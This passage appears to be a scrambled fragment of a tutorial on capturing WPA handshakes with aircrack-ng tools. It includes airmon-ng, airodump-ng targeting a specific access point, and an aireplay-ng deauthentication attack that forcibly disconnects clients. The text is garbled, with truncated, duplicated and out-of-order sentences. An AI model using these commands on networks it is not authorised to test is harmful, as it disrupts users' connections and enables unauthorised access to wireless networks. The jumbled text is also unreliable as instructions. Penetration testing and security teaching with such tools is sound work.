sudo airmon-ng Kill interfering processes:
WPA handshake: <AP_MAC> The .cap file now contains the handshake. Press Ctrl+C to stop airodump-ng . To verify the handshake explicitly: aircrack-ng handshake
sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon This sends 5 deauth packets to broadcast, disconnecting connected clients. Upon reconnection, the 4-way handshake occurs. In the airodump-ng window, watch the top-right corner. When a handshake is captured, you’ll see: disconnecting connected clients. Upon reconnection
sudo airodump-ng --bssid <AP_MAC> -c <channel> -w capture wlan0mon Replace <AP_MAC> and <channel> accordingly. The output files will begin with capture-01.cap . If no client is actively connecting, force reauthentication using aireplay-ng (deauthentication attack): you’ll see: sudo airodump-ng --bssid <